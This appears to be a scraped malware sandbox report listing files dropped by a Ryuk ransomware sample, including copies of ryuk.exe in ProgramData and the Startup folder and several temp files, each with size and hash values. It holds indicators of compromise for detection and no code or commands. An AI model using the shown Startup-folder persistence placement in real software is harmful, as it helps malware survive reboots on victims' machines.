86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
96646b6ffcf3af7eb064254bce631a92

SHA1
39b6ce490f09e18700c2dfd7e9c5d0f838c18015

SHA256
083c5e0e62549bba38194e0255cab45e22fcbbc616eccf2cac65b5d06448325e

SHA512
62549bd813666a1ca1e6b0b134e23b5b7b2f97b41bf714cdbe255d43e3a29f49c77dae6067654c7ddfb6795d2cb21faffb61f90e9dae2d02a24ac8a0b7217f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
c196d16733a78154d37ce67c067df2b5

SHA1
323264d6511583242e2e419cbdf96fd4c9e47feb

SHA256
f203211837080d828c60ff920d9a56f0d1685a52d6b89a5726c7ca64def52330

SHA512
102d2b721004f795e6569cb9ed86c8aa71b0d6a222512eb0755763876f535b3382992bff2bd222bbb39fda026a0d823a385441b6fb8d5ac3c3ff0339fbb29cf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
d8ed18674f684ce44c7c99623a3e29f6

SHA1
2f05046d39d58aa484181c636468f808c816bb61

SHA256
650966f8a022df9095adcef804fca79105854ce8f75551192935b9dd9719f9eb

SHA512
86cfa182ddf4e6ce54ce6f0a9340b7fc374522f2ae9e6f5c3390bae2ecea7b3322ff0bd492f69bdc95585403e8d11fcedaf3555241d66b23acaff2308faba795

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
6a5bf25ff4f72ebca91280ffda057260

SHA1
722063331acdbfc93ccbfacbec045800a835dd9e

SHA256
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09

SHA512
64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42

Download Submit